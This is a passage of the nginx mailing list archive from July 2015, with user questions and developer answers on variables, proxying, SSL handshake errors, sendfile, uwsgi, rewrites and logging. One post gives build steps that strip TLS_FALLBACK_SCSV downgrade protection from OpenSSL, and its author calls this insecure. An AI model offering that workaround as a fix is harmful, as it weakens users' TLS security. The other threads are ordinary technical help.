<20150714173557.GX93501@mdounin.ru> Message-ID: <628cace4e5c7dd8fe6f300b9cd055cce.NginxMailingListEnglish@forum.nginx.org> Hi! Thanks for replying. It appears the issue might actually be on the AWS side. AWS is looking into it. Think its an issue with the elastic load balancer. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260318#msg-260318 From vbart at nginx.com Wed Jul 15 11:07:54 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 15 Jul 2015 14:07:54 +0300 Subject: Storing $server_addr in a variable VS using it directly in location block In-Reply-To: <9eb5f803b00bc4479ae6ac5f6d73e5a2.NginxMailingListEnglish@forum.nginx.org> References: <9eb5f803b00bc4479ae6ac5f6d73e5a2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1844173.35knXJSr6u@vbart-laptop> On Tuesday 14 July 2015 21:46:58 justink101 wrote: > According to the documentation getting the value of $server_addr to set a > response header makes a system call, and can impact performance > negativelyset $ip $server_addr; > > server { > location /health { > add_header Backend $server_addr; > return 200; > } > } > > Would the following be a better solution, and eliminate the system call on > every request? > > server { > set $ip $server_addr; > > location /health { > add_header Backend $ip always; > return 200; > } > } > No, it wouldn't. The "set" directive also is executed on every request. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Wed Jul 15 11:45:34 2015 From: nginx-forum at nginx.us (itpp2012) Date: Wed, 15 Jul 2015 07:45:34 -0400 Subject: Storing $server_addr in a variable VS using it directly in location block In-Reply-To: <1844173.35knXJSr6u@vbart-laptop> References: <1844173.35knXJSr6u@vbart-laptop> Message-ID: Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Tuesday 14 July 2015 21:46:58 justink101 wrote: > > According to the documentation getting the value of $server_addr to > set a > > response header makes a system call, and can impact performance > > negativelyset $ip $server_addr; > No, it wouldn't. The "set" directive also is executed on every > request. Via map as well ? (geo would suffer as well then) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260304,260320#msg-260320 From vbart at nginx.com Wed Jul 15 12:26:51 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 15 Jul 2015 15:26:51 +0300 Subject: Storing $server_addr in a variable VS using it directly in location block In-Reply-To: References: <1844173.35knXJSr6u@vbart-laptop> Message-ID: <12723119.nmceJqzvDj@vbart-laptop> On Wednesday 15 July 2015 07:45:34 itpp2012 wrote: > Valentin V. Bartenev Wrote: > ------------------------------------------------------- > > On Tuesday 14 July 2015 21:46:58 justink101 wrote: > > > According to the documentation getting the value of $server_addr to > > > set a > > > response header makes a system call, and can impact performance > > > negativelyset $ip $server_addr; > > > No, it wouldn't. The "set" directive also is executed on every > > request. > > Via map as well ? (geo would suffer as well then) > All variables work on a per requests basis, no exceptions. wbr, Valentin V. Bartenev From zxcvbn4038 at gmail.com Wed Jul 15 14:27:03 2015 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Wed, 15 Jul 2015 10:27:03 -0400 Subject: Nginx with Organization PROXY server In-Reply-To: References: Message-ID: Try incorporating haproxy (http://www.haproxy.org/) or Apache Traffic Server (http://trafficserver.apache.org/) into your setup. I use NGINX to terminate SSL/SPDY then haproxy to direct the request to the appropriate backend server pool - Haproxy is very good at being a reverse proxy but has no forward proxy features. ATS can terminate SSL/SPDY/HTTP2 and function very well as a forward or reverse proxy, but lacks the pooling, manipulation, and routing facilities that haproxy and nginx provide. On Tue, Jul 14, 2015 at 9:49 AM, Shay Peretz wrote: > Hello , > > on a linux box I define to move the traffic through some Centralize > proxy server ( Organization one ) > in order to configure the proxy from the command line I ran : > export HTTP_PROXY="http://:" > > On the same box I have nginx which serve as a reverse proxy and all > the local application sending the traffic through the local reverse > proxy > > > how can I force the nginx to fwd all the traffic through the ORG proxy > server ? > > chart ... > > > Linux Box Proxy > server | Internet | > |--------------------------------------------| => > |---------------------------| => > -> < nginx > Organization Proxy > | | > > > Thanks ! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 15 16:09:27 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 15 Jul 2015 19:09:27 +0300 Subject: Intermittent SSL Handshake Errors In-Reply-To: <9bd243967b2103df4602fb43702e7722.NginxMailingListEnglish@forum.nginx.org> References: <9bd243967b2103df4602fb43702e7722.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150715160927.GC93501@mdounin.ru> Hello! On Tue, Jul 14, 2015 at 09:58:52PM -0400, tempspace wrote: > Here's what we've learned so far: > > The issue is related to a new security feature that blocks TLS Fallback, > which is a client that connects with one version of TLS, then tries to > downgrade the connection and connect with a lower TLS version.. It was a > feature made in light of the Poodle SSL vulnerability in order to keep SSL > secure. The problem is that many networking libraries still exhibit this > behavior of downgrading TLS versions on purpose, which OpenSSL then blocks > the connection. > > Specificially, the NSURLConnection class on iOS exhibits this behavior. > NSURLSession, the latest iteration of this client, does not. The problem is, > if you want to support iOS 6 still, you HAVE to use NSURLConnection. We > decided to end support for iOS 6 because of this. NSURLConnection is also > completely depracated in iOS 9, so if you want to support iOS 9, you'll have > to upgrade your client library anyway. > > On Android, the same thing happened, but not as often and between different > TLS versions. Switching to Square's Retrofit client for SSL purposes has > worked really well for us. > > So, the real fix is to make sure you update your clients. If you're on a > Debian wheezy box, you can make your own openssl package with the latest > version, but with TLS_FALLBACK_SCSV support removed by following the > directions below. Note, this is not recommended from a security perspective, > but if your environment is broken, you need to do what you need to do. As > long as SSL v3 is disabled, there's no big, active vulnerability in the wild > that takes advantage of fallback at the moment. > > Setup dquilt as shown on > https://www.debian.org/doc/manuals/maint-guide/modify.en.html > > Building Package: > apt-get update ; apt-get source libssl1.0.0 > cd openssl-1.0.1e > dquilt pop Support-TLS_FALLBACK_SCSV > dquilt delete Support-TLS_FALLBACK_SCSV > dpkg-source --commit > dpkg-buildpackage > > The debian packages will be one directory back. Make sure to install the > libssl packages you created, not just openssl, and nginx will need a restart > to use the new library, not just a reload. > > I hope this helps someone, we spent a good amount of time on this. Thanks for the info, appreciated. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Wed Jul 15 19:13:00 2015 From: nginx-forum at nginx.us (shay.peretz@capriza.com) Date: Wed, 15 Jul 2015 15:13:00 -0400 Subject: Nginx with Organization PROXY server In-Reply-To: References: Message-ID: <998204d62793ea1dee0f1c0be4c8adb8.NginxMailingListEnglish@forum.nginx.org> Thanks for the recommendation , I am using nginx as a reverse proxy on each one of my application server . the reason I am doing it is , my application server connect to a backend system which can be available on 2 domains , the nginx as a reverse proxy on my application system verify that if one domain is down it automatically use the 2nd one which might be available . The problem I am having is once the application server need to connect to the backend through a proxy server , the nginx dont know how to move the traffic through a proxy which require authentication and configuration . I start check how complex will it be to update the nginx source code , Can anyone from the nginx team estimate how complex it will be if possible @ all ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260278,260332#msg-260332 From nginx-forum at nginx.us Thu Jul 16 12:19:34 2015 From: nginx-forum at nginx.us (smsmaddy1981) Date: Thu, 16 Jul 2015 08:19:34 -0400 Subject: nginx_status Message-ID: Hi Team, I am configured to use nginx_status and I can see the expected result on the browser Now, the query is: the /nginx_status configuration is done on the server block. Is this required to be repeated for every server block exists in the nginx.conf file? Or any feasibility to set globally for all the servers. Pls. update Regards, Maddy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260370,260370#msg-260370 From nginx-forum at nginx.us Thu Jul 16 12:23:17 2015 From: nginx-forum at nginx.us (smsmaddy1981) Date: Thu, 16 Jul 2015 08:23:17 -0400 Subject: Health Monitoring Message-ID: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> What is the best way to perform health check of Nginx server? Backup Nginx server is recommended, in case of risks with Primary Nginx server? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260371,260371#msg-260371 From mdounin at mdounin.ru Thu Jul 16 17:24:55 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 16 Jul 2015 20:24:55 +0300 Subject: nginx_status In-Reply-To: References: Message-ID: <20150716172455.GR93501@mdounin.ru> Hello! On Thu, Jul 16, 2015 at 08:19:34AM -0400, smsmaddy1981 wrote: > Hi Team, > I am configured to use nginx_status and I can see the expected result on the > browser > > Now, the query is: the /nginx_status configuration is done on the server > block. Is this required to be repeated for every server block exists in the > nginx.conf file? Or any feasibility to set globally for all the servers. There is no need to configure stub_status for each server{} block, stats are global and they are always collected. You just need to configure it in one location to make it possible to access stats. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Jul 16 18:38:36 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 16 Jul 2015 21:38:36 +0300 Subject: Lost connection after reading 2147479552 bytes with sendfile In-Reply-To: <20150715074850.GY17354@eso.org> References: <20150710160130.GB16679@eso.org> <20150711224348.GA93501@mdounin.ru> <20150715074850.GY17354@eso.org> Message-ID: <20150716183836.GV93501@mdounin.ru> Hello! On Wed, Jul 15, 2015 at 09:48:50AM +0200, Mathias Andre wrote: > Hi, > > Thanks for the detailed reply! > > * Maxim Dounin wrote: > > > > > The 2147479552 is a limit applied by default to allow sendfile() > > to work with larger files on Linux up to 2.6.16 (see > > src/os/unix/ngx_linux_sendfile_chain.c for some comments). You can see the > > same limit on the first sendfile() call in the Ubuntu log as well. > > Indeed, I had also seen a lot of reference to this "magic" number around, > so I thought it might be related to it. > > > The strange thing here is that on Scientific Linux 6 the call > > pretends it send all the bytes in a single non-blocking call. > > This is not nginx expects to ever happen, and this is what causes > > the problem to appear. It would be interesting to dig further to > > understand what causes this SL6 behaviour. > > OK, I did write a tiny test program to try and reproduce the problem on > the SL box: it tries to copy 4GB from an existing file in one sendfile > call: > https://gist.github.com/mathiasuk/cf46d0f0caf1dd597e59 > > As expected the sendfile calls return 2147479552, and the output file is > indeed 2147479552 bytes long, so this seems to work. > Here's the trace: > https://gist.github.com/mathiasuk/694177cf6446428f9498 > > I wonder if this could be because my test uses an output file and not a > socket. I'll try and investigate some more. The question is "how this can legitimately happen on a non-blocking socket". The "socket" and "non-blocking" parts are both important. For sure this can happen on a file and/or blocking socket. -- Maxim Dounin http://nginx.org/ From steve at greengecko.co.nz Fri Jul 17 00:40:22 2015 From: steve at greengecko.co.nz (steve) Date: Fri, 17 Jul 2015 12:40:22 +1200 Subject: Health Monitoring In-Reply-To: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> References: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> Message-ID: <55A84EF6.3060709@greengecko.co.nz> I monitor everything using munin, but any MRTG based product ( thanks again Tobi Oetiker! ) will do the job. On 17/07/15 00:23, smsmaddy1981 wrote: > What is the best way to perform health check of Nginx server? > > Backup Nginx server is recommended, in case of risks with Primary Nginx > server? > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260371,260371#msg-260371 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From pchychi at gmail.com Fri Jul 17 04:51:22 2015 From: pchychi at gmail.com (Payam Chychi) Date: Thu, 16 Jul 2015 21:51:22 -0700 Subject: Health Monitoring In-Reply-To: <55A84EF6.3060709@greengecko.co.nz> References: <52f4960f7a66e5aa2d897e105fa47b28.NginxMailingListEnglish@forum.nginx.org> <55A84EF6.3060709@greengecko.co.nz> Message-ID: <4494CCC1B4E44E679738FA56E5F8B591@gmail.com> Cacti, great and does everything and more -- Payam Chychi Network Engineer / Security Specialist On Thursday, July 16, 2015 at 5:40 PM, steve wrote: > I monitor everything using munin, but any MRTG based product ( thanks > again Tobi Oetiker! ) will do the job. > > On 17/07/15 00:23, smsmaddy1981 wrote: > > What is the best way to perform health check of Nginx server? > > > > Backup Nginx server is recommended, in case of risks with Primary Nginx > > server? > > > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260371,260371#msg-260371 > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > -- > Steve Holdoway BSc(Hons) MIITP > http://www.greengecko.co.nz > Linkedin: http://www.linkedin.com/in/steveholdoway > Skype: sholdowa > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From gaccardo at gmail.com Fri Jul 17 12:09:22 2015 From: gaccardo at gmail.com (Guido) Date: Fri, 17 Jul 2015 09:09:22 -0300 Subject: Problem with nginx + uwsgi Message-ID: Hi everybody, I'm having a problem with my nginx and uwsgi. I don't really know what I'm doing wrong. Here is the configuration of nginx: server { listen 80; location /api/v1 { uwsgi_pass unix:///tmp/api.sock; include uwsgi_params; } location / { return 444; } And this is uwsgi configuration: [uwsgi] socket = /tmp/api.sock chdir = /var/www/api master = true plugin = python pp = /home/api/src file = uwsgi.py uid = www-data gid = www-data threads = 4 workers = 4 callable = app chmod-socket = 666 post-buffering = 4096 virtualenv = /usr/local/venvs/api callable = ins env = API_SETTINGS_FILE=../../etc/settings.py If I execute following command everything seems to be working fine: curl -v http://127.0.0.1/api/v1/login { "message": "Method Not Allowed", "status": 405 } HTTP/405 it's the expected answer since the app doesn't allow login resquets with GET method, So now I'm going to try with POST. The application expects for data such as email and password, so this should trigger a 500 in the api backend curl http://10.10.10.35/api/v1/login -X POST uwsgi log: [pid: 19484|app: 0|req: 5/5] 127.0.0.1 () {30 vars in 340 bytes} [Fri Jul 17 12:05:00 2015] POST /api/v1/login => generated 0 bytes in 432 msecs (HTTP/1.1 500) 0 headers in 0 bytes (0 switches on core 0) Everything good but the answer of nginx it's wrong: 502 Bad Gateway

502 Bad Gateway


nginx/1.7.1
So for any reason nginx interpret the HTTP/500 from the API as the gateway it's no available. Do you see what I'm doing wrong? More info: Nginx 1.8.0 Ubuntu 12.04 uWSGI 1.0.3 Thanks in advance -- -- Guido Accardo -- "... What we know is a drop, what we ignore is the ocean ..." Isaac Newton -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 17 15:12:42 2015 From: nginx-forum at nginx.us (dr.net) Date: Fri, 17 Jul 2015 11:12:42 -0400 Subject: Rewrite rules in nginx config Message-ID: Hi all, thank's to accept me in this forum. I'm a newbie... I have a problem with a rewrite rules that I imported from apache This is my code index home.php index.php; location / { rewrite ^/(.*)?$ /categories.php?cat=$1; rewrite ^/(.*).html?$ /game.php?game=$1; rewrite ^/(.*)/(.*).html?$ /game.php?game=$2 break; } location /dists/ { # Do nothing. nginx will serve files as usual. } location /images/ { # Do nothing. nginx will serve files as usual. } location /admin/ { # Do nothing. nginx will serve files as usual. } location /css/ { # Do nothing. nginx will serve files as usual. } location /config/ { # Do nothing. nginx will serve files as usual. } I'd like ti take parameters from cat and game and use them to know the path. This is oc, but so... all others directories don't work. Is this configuration so insensitive? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260404,260404#msg-260404 From miguelmclara at gmail.com Fri Jul 17 15:35:54 2015 From: miguelmclara at gmail.com (Miguel C) Date: Fri, 17 Jul 2015 16:35:54 +0100 Subject: Rewrite rules in nginx config In-Reply-To: References: Message-ID: On Fri, Jul 17, 2015 at 4:12 PM, dr.net wrote: > Hi all, > thank's to accept me in this forum. > > I'm a newbie... I have a problem with a rewrite rules that I imported from > apache > > This is my code > > > index home.php index.php; > location / { > rewrite ^/(.*)?$ /categories.php?cat=$1; > rewrite ^/(.*).html?$ /game.php?game=$1; > rewrite ^/(.*)/(.*).html?$ /game.php?game=$2 break; > } > Before anything... you seem to want to serve PHP, but I don't see anything in the config pointing to a php backend such as php-fpm... > location /dists/ { > # Do nothing. nginx will serve files as usual. > } > > location /images/ { > # Do nothing. nginx will serve files as usual. > } > location /admin/ { > # Do nothing. nginx will serve files as usual. > } > location /css/ { > # Do nothing. nginx will serve files as usual. > } > location /config/ { > # Do nothing. nginx will serve files as usual. > } > As for this locations you could simplify to just one whats the "root" path? you don't seem to define one, unless you didn't paste the full config. > I'd like ti take parameters from cat and game and use them to know the path. > > This is oc, but so... all others directories don't work. > Is this configuration so insensitive? > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260404,260404#msg-260404 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx at netdirect.fr Fri Jul 17 15:40:20 2015 From: nginx at netdirect.fr (Artur) Date: Fri, 17 Jul 2015 17:40:20 +0200 Subject: try_files setup In-Reply-To: <559FE1CF.6010703@netdirect.fr> References: <559FE1CF.6010703@netdirect.fr> Message-ID: <55A921E4.6060103@netdirect.fr> No one has any idea about the solution for this problem ? -- Best regards, Artur. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 17 16:04:03 2015 From: nginx-forum at nginx.us (dr.net) Date: Fri, 17 Jul 2015 12:04:03 -0400 Subject: Rewrite rules in nginx config In-Reply-To: References: Message-ID: <744e6653f53a838e87fb9db5e37570a9.NginxMailingListEnglish@forum.nginx.org> Hi Mike, thank's for reply. I haven't posted all the config because the server is maintained and I have to send to administrator only che rewrite config The php-fpm works Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260404,260408#msg-260408 From miguelmclara at gmail.com Fri Jul 17 16:20:32 2015 From: miguelmclara at gmail.com (Miguel C) Date: Fri, 17 Jul 2015 17:20:32 +0100 Subject: try_files setup In-Reply-To: <55A921E4.6060103@netdirect.fr> References: <559FE1CF.6010703@netdirect.fr> <55A921E4.6060103@netdirect.fr> Message-ID: Add this to the php location try_files $uri =404; Melhores Cumprimentos // Best Regards ----------------------------------------------- Miguel Clara IT - Sys Admin & Developer On Fri, Jul 17, 2015 at 4:40 PM, Artur wrote: > No one has any idea about the solution for this problem ? > > -- > > Best regards, > Artur. > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Fri Jul 17 21:49:23 2015 From: nginx-forum at nginx.us (ecflyer) Date: Fri, 17 Jul 2015 17:49:23 -0400 Subject: [Nginx] How to support file upload in Nginx 1.8 In-Reply-To: References: Message-ID: <80467348404becadd56c2a384e7e60b4.NginxMailingListEnglish@forum.nginx.org> I'm very new, a novice when it comes to nginx and setting up a web server, and trying to figure out how to upload files. We already have an Apache solution with PHP, but do not want to use PHP anymore. I've looked over this tutorial but could not get it to work: https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend Is there a really elementary step-by-step explanation for adding upload capability through a post command? I mean, I'm not even sure where all the files and folders are supposed to go. Finally, we will not be uploading files through a web-browser, but from desktop and mobile applications. So any explanations related to that may not be helpful. Sorry to be such a newbie, but I don't have a ton of experience outside my programming language: LiveCode. But I am diving in trying to learn more. I'm on Ubuntu 14.04 using nginx 1.8.0. I also added the nginx_upload_module to my build; not sure if this is causing problems trying to use clientbodyinfileonly. TIA, e Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259249,260411#msg-260411 From ben+nginx at list-subs.com Sat Jul 18 10:37:33 2015 From: ben+nginx at list-subs.com (Ben) Date: Sat, 18 Jul 2015 11:37:33 +0100 Subject: Conditional access log formatting ? Message-ID: <55AA2C6D.8090106@list-subs.com> Hi, I'm using haproxy infront of some NGINX instances, but only for some instances which are being loadbalanced by haproxy, there are other instances which go straight through. I realise I need to change the logging format in NGINX to enable X-Forwarded-For in the access logs. The question is whether I can conditionally format the logs, i.e. use "X-Forwarded-For" if it exists, otherwise use the normal NGINX logging format. I've had a quick peek at the manual, I'm thinking maybe this can be done with a map of some sort ? Maybe there's a better way ? To be honest I've no idea where to start, and I've never used maps before anyway ! From nginx-forum at nginx.us Sat Jul 18 12:15:26 2015 From: nginx-forum at nginx.us (xfeep) Date: Sat, 18 Jul 2015 08:15:26 -0400 Subject: [ANN]nginx-access-plus v0.1.0 released! Message-ID: Nginx-Access-Plus is a Nginx module allows limiting access to certain http request methods and client addresses. e.g. location / { allow_method all get|head; allow_method 192.168.1.0/24 post|delete; deny_method all all; } website : https://github.com/nginx-clojure/nginx-access-plus Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260414,260414#msg-260414 From nginx-forum at nginx.us Sat Jul 18 12:32:00 2015 From: nginx-forum at nginx.us (xfeep) Date: Sat, 18 Jul 2015 08:32:00 -0400 Subject: [ANN]nginx-access-plus v0.1.0 released! In-Reply-To: References: Message-ID: <0f4da6b920a1abf9cdc808f177f09a82.NginxMailingListEnglish@forum.nginx.org> Nginx-Access-Plus is a Nginx module allows limiting access to certain http request methods and client addresses. e.g. location / { allow_method all get|head; allow_method 192.168.1.0/24 post|delete; deny_method all all; } website : https://github.com/nginx-clojure/nginx-access-plus Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260414,260415#msg-260415 From marcus.james at gmail.com Sat Jul 18 16:29:27 2015 From: marcus.james at gmail.com (James Marcus) Date: Sat, 18 Jul 2015 12:29:27 -0400 Subject: browser downloading html files Message-ID: Hi, Haven't used nginx in few years and trying to get it into production. i'm having what will probably be a silly misconfiguration to most. I'm running nginx *nginx*-1.8.0-1.el7.ngx.x86_64 CentOS 7 with PHP-fpm When I hit every PHP link on this site it generates some html and my browser downloads it. I used the winginx .htaccess converter to create the rewrite rules. Any direction would be great Thanks, James Here is my config: server { listen 80; server_name www.imagesite.net *.imagesite.net; root /var/www/imagesite.net/html; index index.php; error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # location ~ \.php$ { root html; fastcgi_pass 127.0.0.1:9000; fastcgi_intercept_errors on; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /var/www/ imagesite.net/html$fastcgi_script_name; include fastcgi_params; } # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # location ~ /\.ht { deny all; } autoindex off; location / { autoindex off; rewrite ^/([^/]*)/([^/]*)/([^/]*)\.html$ /item.php?parentcategorie=$1&categorie=$2&fx=$3 break; rewrite ^/([^/]*)/$ /cat.php?parentcategorie=$1 break; rewrite ^/([^/]*)/([^/]*)/$ /subcat.php?parentcategorie=$1&categorie=$2 break; rewrite ^/([^/]*)/([^/]*)/([^/]*)/([^/]*)\.html$ /page.php?parentcategorie=$1&categorie=$2&fx=$3&img=$4 break; try_files $uri $uri/ =404; } } -------------- next part -------------- An HTML attachment was scrubbed... URL: From reallfqq-nginx at yahoo.fr Sat Jul 18 18:02:17 2015 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sat, 18 Jul 2015 20:02:17 +0200 Subject: Conditional access log formatting ? In-Reply-To: <55AA2C6D.8090106@list-subs.com> References: <55AA2C6D.8090106@list-subs.com> Message-ID: I suggest you use the 'if' parameter of 2 access_log directive (>v1.7.0), combined with 2 maps with reversed logic. --- *B. R.* On Sat, Jul 18, 2015 at 12:37 PM, Ben wrote: > Hi, > > I'm using haproxy infront of some NGINX instances, but only for some > instances which are being loadbalanced by haproxy, there are other > instances which go straight through. > > I realise I need to change the logging format in NGINX to enable > X-Forwarded-For in the access logs. > > The question is whether I can conditionally format the logs, i.e. use > "X-Forwarded-For" if it exists, otherwise use the normal NGINX logging > format. > > I've had a quick peek at the manual, I'm thinking maybe this can be done > with a map of some sort ? Maybe there's a better way ? To be honest I've > no idea where to start, and I've never used maps before anyway ! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From stainwash.dev at gmail.com Sun Jul 19 16:02:14 2015 From: stainwash.dev at gmail.com (murali kumar) Date: Sun, 19 Jul 2015 21:32:14 +0530 Subject: Subdomain configuration problem Message-ID: Hi, I'm beginner in nginx, and i have searched google and mailing list but no luck. my nginx.conf: http{ server{ listen 80; server_name example.com www.example.com; location / { proxy_pass http://127.0.0.1:aaaa/; } } server{ listen 80; server_name subdomain.example.com; location / { proxy_pass http://127.0.0.1:bbbb/; } } #rest of the default config like acces log, etc } Problem is after adding server block for subdomain, both request ( example.com, subdomain.example.com) loading only example.com in browser. If i place subdomain server block listing as first one, both request ( example.com, subdomain.example.com) loading subdomain.example.com in browser. Please suggest me what could be the problem. Thanks in Advance!! -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 20 03:14:14 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 20 Jul 2015 06:14:14 +0300 Subject: Subdomain configuration problem In-Reply-To: References: Message-ID: <20150720031414.GF87067@mdounin.ru> Hello! On Sun, Jul 19, 2015 at 09:32:14PM +0530, murali kumar wrote: > Hi, > > I'm beginner in nginx, and i have searched google and mailing list but no > luck. > > my nginx.conf: > > http{ > server{ > listen 80; > server_name example.com www.example.com; > location / { > proxy_pass http://127.0.0.1:aaaa/; > } > } > server{ > listen 80; > server_name subdomain.example.com; > location / { > proxy_pass http://127.0.0.1:bbbb/; > } > } > #rest of the default config like acces log, etc > } > > > > Problem is after adding server block for subdomain, both request ( > example.com, subdomain.example.com) loading only example.com in browser. > If i place subdomain server block listing as first one, both request ( > example.com, subdomain.example.com) loading subdomain.example.com in > browser. > > Please suggest me what could be the problem. Likely reason is a typo in the domain name as listen in the "server_name" directives. -- Maxim Dounin http://nginx.org/ From stainwash.dev at gmail.com Mon Jul 20 12:13:42 2015 From: stainwash.dev at gmail.com (murali kumar) Date: Mon, 20 Jul 2015 17:43:42 +0530 Subject: Subdomain configuration problem In-Reply-To: <20150720031414.GF87067@mdounin.ru> References: <20150720031414.GF87067@mdounin.ru> Message-ID: Can't believe!! You are right. Thanks for the suggestion. On Mon, Jul 20, 2015 at 8:44 AM, Maxim Dounin wrote: > Hello! > > On Sun, Jul 19, 2015 at 09:32:14PM +0530, murali kumar wrote: > > > Hi, > > > > I'm beginner in nginx, and i have searched google and mailing list but no > > luck. > > > > my nginx.conf: > > > > http{ > > server{ > > listen 80; > > server_name example.com www.example.com; > > location / { > > proxy_pass http://127.0.0.1:aaaa/; > > } > > } > > server{ > > listen 80; > > server_name subdomain.example.com; > > location / { > > proxy_pass http://127.0.0.1:bbbb/; > > } > > } > > #rest of the default config like acces log, etc > > } > > > > > > > > Problem is after adding server block for subdomain, both request ( > > example.com, subdomain.example.com) loading only example.com in browser. > > If i place subdomain server block listing as first one, both request ( > > example.com, subdomain.example.com) loading subdomain.example.com in > > browser. > > > > Please suggest me what could be the problem. > > Likely reason is a typo in the domain name as listen in the > "server_name" directives. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Mon Jul 20 12:48:47 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 20 Jul 2015 15:48:47 +0300 Subject: Conditional access log formatting ? In-Reply-To: <55AA2C6D.8090106@list-subs.com> References: <55AA2C6D.8090106@list-subs.com> Message-ID: <1619898.nlKE7gvPRW@vbart-workstation> On Saturday 18 July 2015 11:37:33 Ben wrote: > Hi, > > I'm using haproxy infront of some NGINX instances, but only for some > instances which are being loadbalanced by haproxy, there are other > instances which go straight through. > > I realise I need to change the logging format in NGINX to enable > X-Forwarded-For in the access logs. > > The question is whether I can conditionally format the logs, i.e. use > "X-Forwarded-For" if it exists, otherwise use the normal NGINX logging > format. > > I've had a quick peek at the manual, I'm thinking maybe this can be done > with a map of some sort ? Maybe there's a better way ? To be honest > I've no idea where to start, and I've never used maps before anyway ! > You should use the realip module: http://nginx.org/en/docs/http/ngx_http_realip_module.html wbr, Valentin V. Bartenev From vbart at nginx.com Mon Jul 20 15:07:39 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 20 Jul 2015 18:07:39 +0300 Subject: Problem with nginx + uwsgi In-Reply-To: References: Message-ID: <2154833.ntoxBUQ3yS@vbart-workstation> On Friday 17 July 2015 09:09:22 Guido wrote: > Hi everybody, > > I'm having a problem with my nginx and uwsgi. I don't really know what > I'm doing wrong. > > Here is the configuration of nginx: > > server { > listen 80; > > location /api/v1 { > uwsgi_pass unix:///tmp/api.sock; > include uwsgi_params; > } > > location / { > return 444; > } > > And this is uwsgi configuration: > > [uwsgi] > socket = /tmp/api.sock > chdir = /var/www/api > master = true > plugin = python > pp = /home/api/src > file = uwsgi.py > uid = www-data > gid = www-data > threads = 4 > workers = 4 > callable = app > chmod-socket = 666 > post-buffering = 4096 > virtualenv = /usr/local/venvs/api > callable = ins > env = API_SETTINGS_FILE=../../etc/settings.py > > If I execute following command everything seems to be working fine: > > curl -v http://127.0.0.1/api/v1/login > > { > "message": "Method Not Allowed", > "status": 405 > } > > HTTP/405 it's the expected answer since the app doesn't allow login > resquets with GET method, So now I'm going to try with POST. > > The application expects for data such as email and password, so this should > trigger a 500 in the api backend > > curl http://10.10.10.35/api/v1/login -X POST > > uwsgi log: > > [pid: 19484|app: 0|req: 5/5] 127.0.0.1 () {30 vars in 340 bytes} [Fri Jul > 17 12:05:00 2015] POST /api/v1/login => generated 0 bytes in 432 msecs > (HTTP/1.1 500) 0 headers in 0 bytes (0 switches on core 0) [..] You should look what exactly is returned from your backend. >From the log above it looks like it returns nothing. To shed some light you can enable the debug log in nginx: http://nginx.org/en/docs/debugging_log.html wbr, Valentin V. Bartenev From nginx-forum at nginx.us Tue Jul 21 19:33:13 2015 From: nginx-forum at nginx.us (smuthali) Date: Tue, 21 Jul 2015 15:33:13 -0400 Subject: Nginx 1.8 proxying to Netty - timeout from 